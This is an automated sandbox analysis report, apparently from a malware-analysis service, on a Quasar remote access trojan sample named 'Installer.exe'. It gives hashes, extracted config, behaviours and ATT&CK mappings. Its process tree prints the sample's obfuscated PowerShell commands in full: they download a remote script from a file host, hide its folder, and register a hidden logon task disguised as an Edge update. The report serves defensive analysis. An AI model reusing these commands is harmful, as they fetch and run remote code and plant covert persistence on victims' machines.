quasar | bfa990bda3eebc658bcd0014dbfc9d57277e585548031f7ce4ecfcc8223f7b6b

Analysis

max time kernel
145s
max time network
148s
platform
windows11-21h2_x64
resource
win11-20250410-en
resource tags

arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system
submitted
19/04/2025, 15:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Installer.exe
Size

53KB
MD5

f323bb458ecbd21acdddd5ea770e775f
SHA1

9b04a6ea2e6efcc81d344f6425928c5700e9a3f6
SHA256

4030427f5e93a3cbb5072fe12afb02a4cb6447a4d0061b4dc9f71fdb783ab926
SHA512

ca08182341611a89da1f4c90efbd065691a551e68d534ed509bf3ffca8d821362be14b175cfb8378fc2199432938c1d3e63524d9424802a37c0435467a5dabe2
SSDEEP

768:ZId0rRueeCTXZJa0CMpWBUlNP/hA8OE2fbsE/g0+EFiRs:ZId+KQXZPCiWBU8fAL5eim

Score

10^/10

quasar execution spyware trojan

Malware Config

Extracted

Family

quasar

��:a>՘�后��s��6�F�l濺�,@ 3&�

Attributes

encryption_key
0A2600918F5E13281DD3F3E3CF35CA2FEACB6884
reconnect_delay
3000
startup_key
�� D��s�+��\� r8t$�

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral6/memory/3224-56-0x000002104AEE0000-0x000002104B06E000-memory.dmp	family_quasar

Blocklisted process makes network request 5 IoCs

flow	pid	Process
6	1780	powershell.exe
7	3224	powershell.exe
8	3224	powershell.exe
9	3224	powershell.exe
11	3224	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2192	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
10	whatismyip.com

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
3256	ipconfig.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3224	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2192	powershell.exe
2192	powershell.exe
1780	powershell.exe
1780	powershell.exe
3224	powershell.exe
3224	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	4868	Installer.exe
Token: SeBackupPrivilege	4868	Installer.exe
Token: SeDebugPrivilege	4868	Installer.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeIncreaseQuotaPrivilege	2192	powershell.exe
Token: SeSecurityPrivilege	2192	powershell.exe
Token: SeTakeOwnershipPrivilege	2192	powershell.exe
Token: SeLoadDriverPrivilege	2192	powershell.exe
Token: SeSystemProfilePrivilege	2192	powershell.exe
Token: SeSystemtimePrivilege	2192	powershell.exe
Token: SeProfSingleProcessPrivilege	2192	powershell.exe
Token: SeIncBasePriorityPrivilege	2192	powershell.exe
Token: SeCreatePagefilePrivilege	2192	powershell.exe
Token: SeBackupPrivilege	2192	powershell.exe
Token: SeRestorePrivilege	2192	powershell.exe
Token: SeShutdownPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeSystemEnvironmentPrivilege	2192	powershell.exe
Token: SeRemoteShutdownPrivilege	2192	powershell.exe
Token: SeUndockPrivilege	2192	powershell.exe
Token: SeManageVolumePrivilege	2192	powershell.exe
Token: 33	2192	powershell.exe
Token: 34	2192	powershell.exe
Token: 35	2192	powershell.exe
Token: 36	2192	powershell.exe
Token: SeIncreaseQuotaPrivilege	2192	powershell.exe
Token: SeSecurityPrivilege	2192	powershell.exe
Token: SeTakeOwnershipPrivilege	2192	powershell.exe
Token: SeLoadDriverPrivilege	2192	powershell.exe
Token: SeSystemProfilePrivilege	2192	powershell.exe
Token: SeSystemtimePrivilege	2192	powershell.exe
Token: SeProfSingleProcessPrivilege	2192	powershell.exe
Token: SeIncBasePriorityPrivilege	2192	powershell.exe
Token: SeCreatePagefilePrivilege	2192	powershell.exe
Token: SeBackupPrivilege	2192	powershell.exe
Token: SeRestorePrivilege	2192	powershell.exe
Token: SeShutdownPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeSystemEnvironmentPrivilege	2192	powershell.exe
Token: SeRemoteShutdownPrivilege	2192	powershell.exe
Token: SeUndockPrivilege	2192	powershell.exe
Token: SeManageVolumePrivilege	2192	powershell.exe
Token: 33	2192	powershell.exe
Token: 34	2192	powershell.exe
Token: 35	2192	powershell.exe
Token: 36	2192	powershell.exe
Token: SeIncreaseQuotaPrivilege	2192	powershell.exe
Token: SeSecurityPrivilege	2192	powershell.exe
Token: SeTakeOwnershipPrivilege	2192	powershell.exe
Token: SeLoadDriverPrivilege	2192	powershell.exe
Token: SeSystemProfilePrivilege	2192	powershell.exe
Token: SeSystemtimePrivilege	2192	powershell.exe
Token: SeProfSingleProcessPrivilege	2192	powershell.exe
Token: SeIncBasePriorityPrivilege	2192	powershell.exe
Token: SeCreatePagefilePrivilege	2192	powershell.exe
Token: SeBackupPrivilege	2192	powershell.exe
Token: SeRestorePrivilege	2192	powershell.exe
Token: SeShutdownPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeSystemEnvironmentPrivilege	2192	powershell.exe
Token: SeRemoteShutdownPrivilege	2192	powershell.exe
Token: SeUndockPrivilege	2192	powershell.exe
Token: SeManageVolumePrivilege	2192	powershell.exe
Token: 33	2192	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3224	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 4868 wrote to memory of 1520	4868	Installer.exe	79
PID 4868 wrote to memory of 1520	4868	Installer.exe	79
PID 1520 wrote to memory of 276	1520	cmd.exe	80
PID 1520 wrote to memory of 276	1520	cmd.exe	80
PID 276 wrote to memory of 328	276	winAPI.dll	81
PID 276 wrote to memory of 328	276	winAPI.dll	81
PID 328 wrote to memory of 2764	328	cmd.exe	82
PID 328 wrote to memory of 2764	328	cmd.exe	82
PID 2764 wrote to memory of 4792	2764	cmd.exe	83
PID 2764 wrote to memory of 4792	2764	cmd.exe	83
PID 2764 wrote to memory of 2192	2764	cmd.exe	84
PID 2764 wrote to memory of 2192	2764	cmd.exe	84
PID 2764 wrote to memory of 1780	2764	cmd.exe	86
PID 2764 wrote to memory of 1780	2764	cmd.exe	86
PID 2764 wrote to memory of 3224	2764	cmd.exe	87
PID 2764 wrote to memory of 3224	2764	cmd.exe	87
PID 3224 wrote to memory of 236	3224	powershell.exe	88
PID 3224 wrote to memory of 236	3224	powershell.exe	88
PID 236 wrote to memory of 456	236	csc.exe	89
PID 236 wrote to memory of 456	236	csc.exe	89
PID 3224 wrote to memory of 5088	3224	powershell.exe	90
PID 3224 wrote to memory of 5088	3224	powershell.exe	90
PID 5088 wrote to memory of 4376	5088	cmd.exe	92
PID 5088 wrote to memory of 4376	5088	cmd.exe	92
PID 5088 wrote to memory of 3256	5088	cmd.exe	93
PID 5088 wrote to memory of 3256	5088	cmd.exe	93
PID 5088 wrote to memory of 1988	5088	cmd.exe	94
PID 5088 wrote to memory of 1988	5088	cmd.exe	94

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4792	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\Installer.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c winAPI.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1520
- - C:\Users\Admin\AppData\Local\Temp\winAPI.dll
    winAPI.dll
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:276
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:328
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2764
      - C:\Windows\system32\attrib.exe
        
        attrib +h "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache"
        6⤵
        Views/modifies file attributes
        
        PID:4792
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoPr"o"file -Execu"t"ionPolic"y" Byp"a"ss -Windo"w"Style Hid"d"en -Com"m"and "$action = New-ScheduledT"a"skAction -Execute 'powershell.exe' -Argument '-NoProfile -Exe"c"utionPo"l"icy B"y"pass -Wind"o"wStyle Hidden -File \"C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1\"'; $trigger = New-ScheduledTaskTrigger -AtLogOn -User $env:USERNAME; $settings = New-ScheduledTaskSettingsSet -Hidden -DontStopIfGoingOnBatteries; $principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive; Register-ScheduledTask -TaskName 'Micro"s"oftEdge"U"pdat"e"Task' -Action $action -Trigger $trigger -Settings $settings -Principal $principal -Force | Out-Null"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2192
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoPr"o"file -Exe"c"utionPol"i"cy By"p"ass -Win"d"owStyle H"i"dd"e"n -Co"m"mand "Invo"k"e-W"e"bRequ"e"st 'ht"t"ps://"f"iles."c"atbo"x".moe/92nbzf.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1' -Use"B"asicParsing"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:1780
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -N"o"Profi"l"e -Execu"t"ionPol"i"cy Bypa"s"s -WindowSt"y"le Hi"d"den -Fi"l"e "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3224
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\guplt2ba\guplt2ba.cmdline"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:236
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0CA.tmp" "c:\Users\Admin\AppData\Local\Temp\guplt2ba\CSCE826E5AF11F5446DAD4A2992499EB93.TMP"
        8⤵
        
        PID:456
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /K CHCP 437
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:5088
        
        C:\Windows\system32\chcp.com
        
        CHCP 437
        8⤵
        
        PID:4376
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig
        8⤵
        Gathers network information
        
        PID:3256
        
        C:\Windows\system32\curl.exe
        
        curl whatismyip.com
        8⤵
        
        PID:1988

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
a0bbe24ebd401a5b686897c0082e38d6

SHA1
28a7fa043b94e1bdde2bc6832409cc0c5679ff16

SHA256
9ff0bc6cb5909fb7377f9011e0d28a58f66a79374ef233a3f83e33333ad36c8b

SHA512
3c421e9f1eb318eec5bb6424cd2a53795478e586273f994619249e56c965bb9b4c5b71a376f27ceb1ca6b82ed47d039b9cf2345ad5eed911560ddc39e43e062b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
709a1a59fac0b17ed38b125983e17478

SHA1
fccba52fb24f51aed0aa22d50a90ea431ba40578

SHA256
10c3bda53884e5c2480b4e20200fb687c99bff4a9e156b2afaf670f933018f4a

SHA512
3c504eb883537f97ce0a97139d6275973335825f624dbd0ca5b55e64cf93faba05aa86f9db601e0c590d9dc5ccd4ec5c8d56d35c5632396f9d55d53f1074e3e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
261ea88cc20dbaa02e7e8e9c13e5f375

SHA1
af242ef41b5a4361aef962362c695d09240d7c5a

SHA256
846acab3faefea9dfd415db61e85998ad90bb17fa2203a52d1eaa079060c1163

SHA512
f24553303942a50d0b622b1552cafa5248f7d2a82cdc54b0a6919429663a36377b7072689c010a0e7a62a690f598483bf2adbc8799f14a8eae3e83e10719fa71

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.bat

Filesize
1KB

MD5
56ed4e1fbde1df51fb37b6677265ec3d

SHA1
6dc4cf3ebe6c0043c6fca9b5c9c46a3f5a492d17

SHA256
d65e44cd5593e4f8d380c23516e94db3b18e9a5c42ef40697beb2a611aaa9204

SHA512
c9c037b3713d2774301a4d68beee7c528fd2ade5aac95f06c82b1ef9f23ba47ec316cfc0d711fd773c8c81fd33366537395daee361325c5465cf02eb6dae41c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC0CA.tmp

Filesize
1KB

MD5
30e505558a27ef1956059334ed5c86fc

SHA1
40f2532a9583d24358d95a41ed10a41ac7a7cabd

SHA256
354f74dbb762d28e2fe95f178e28e4cb7f1f0f35dc41b751261431da5d4ec414

SHA512
d5f17eb6bfb8d9a1e178512463142ee7fc91795e553867b6b51bc2195e3c01e458c445d477d2165a5c29669f9d4792023402438895b3e5c8a2159afe6a2dfc71

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w1yp4hzn.jbt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\guplt2ba\guplt2ba.dll

Filesize
3KB

MD5
7fd76bc7b31532fffd001d39f4d0f8fd

SHA1
a2ceefb6b37c7ed91b4343c54ce2b7cfeb597d2b

SHA256
8f961c4f90563b297692a45e7f191060c6dc01c62dedd9ecad5204619781b962

SHA512
ef13282770045ab53774b22b358f89cf5cd95caf7b795a480e173e81b631d72565f79ad845519f91fc8cae170c0903edb2bbcd3f23d4705cd029dd45c9c3cb05

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\UDCache\task.ps1

Filesize
7.0MB

MD5
f46cd513598c2b1ffb63fe501301dd64

SHA1
d1d71cfdc9ea551470478b2452d0e451b8d055e8

SHA256
e8d38cba909fb2374dc0a406fcc0c4360ffb12ba5d588856690e7e06657e6df5

SHA512
bbd43f0f9b7eddc0857ac14339859e0e6b756de8749e54795d86bcdb580d6bf369a5a4050231bf1bdb361ff817907175180f04f352df2e35fce63fbeb4f91974

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\guplt2ba\CSCE826E5AF11F5446DAD4A2992499EB93.TMP

Filesize
652B

MD5
6a65df1fb755a4b1e740f32f95f9f32e

SHA1
b91776da7f65677dbec00d80094245e339db7175

SHA256
ae72929e910c028262b34bc4b197473f670e782b2019f20e3d47804ed7696ab5

SHA512
dd0191bc23bdc266ed78c3f55335963d6ac8d4b6e5209743ec535e44f5c0847fcba30241c9212ad664876a9abc3dbd9ba066af6ccd83bfae54f961289e4d1c52

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\guplt2ba\guplt2ba.0.cs

Filesize
938B

MD5
5b328f64341f326554c2d3c08ace5f93

SHA1
25a9aad6022782e5200d410aa9ff8e707ee2eb1a

SHA256
6e7a0c2174ae7882e6bd3f4afdf0438b982649021048df980b08c5ac948a01b9

SHA512
d4116697a54bc21a8d77aaa8eeafa95d60b6873073f2294d027829a83dc82bf39d63f08464b7622dcfd4ec3a1991b6225f72399321a5f93582d84387088badd0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\guplt2ba\guplt2ba.cmdline

Filesize
369B

MD5
cdcdaaea5b451e23e1b75c7693c22162

SHA1
b20eacc2551bba68dbbfdced7ec09a550207177b

SHA256
3bcb0d8b34810816078eb0b57607232fb1f93e632e0570575e91bee3ee12ce8d

SHA512
899d99e92cdf83b872d3a001470a6cc81405e116bfd938c93571fd5aa4790f1920cd62377a46fed4fe05a4789ec51487076007ae65e9ebb2bafa1812ca538d99

Download Submit
memory/2192-12-0x00000245F3DA0000-0x00000245F3DC2000-memory.dmp

Filesize
136KB

Download
memory/3224-60-0x00000210427D0000-0x0000021042820000-memory.dmp

Filesize
320KB

Download
memory/3224-65-0x0000021032400000-0x000002103242A000-memory.dmp

Filesize
168KB

Download
memory/3224-69-0x000002104B530000-0x000002104B56C000-memory.dmp

Filesize
240KB

Download
memory/3224-52-0x0000021009B80000-0x0000021009B88000-memory.dmp

Filesize
32KB

Download
memory/3224-54-0x0000021042660000-0x00000210427CA000-memory.dmp

Filesize
1.4MB

Download
memory/3224-56-0x000002104AEE0000-0x000002104B06E000-memory.dmp

Filesize
1.6MB

Download
memory/3224-57-0x0000021009BC0000-0x0000021009BDA000-memory.dmp

Filesize
104KB

Download
memory/3224-58-0x0000021032430000-0x0000021032442000-memory.dmp

Filesize
72KB

Download
memory/3224-59-0x0000021032440000-0x000002103247A000-memory.dmp

Filesize
232KB

Download
memory/3224-68-0x000002104B4D0000-0x000002104B4E2000-memory.dmp

Filesize
72KB

Download
memory/3224-61-0x000002104B700000-0x000002104B7B2000-memory.dmp

Filesize
712KB

Download
memory/3224-62-0x0000021032480000-0x00000210324CE000-memory.dmp

Filesize
312KB

Download
memory/3224-63-0x000002104AE40000-0x000002104AE8C000-memory.dmp

Filesize
304KB

Download
memory/3224-64-0x000002104AE90000-0x000002104AEDA000-memory.dmp

Filesize
296KB

Download
memory/4868-27-0x0000000210040000-0x0000000210346000-memory.dmp

Filesize
3.0MB

Download
memory/4868-0-0x0000000210040000-0x0000000210346000-memory.dmp

Filesize
3.0MB

Download
memory/4868-25-0x0000000100400000-0x000000010040D000-memory.dmp

Filesize
52KB

Download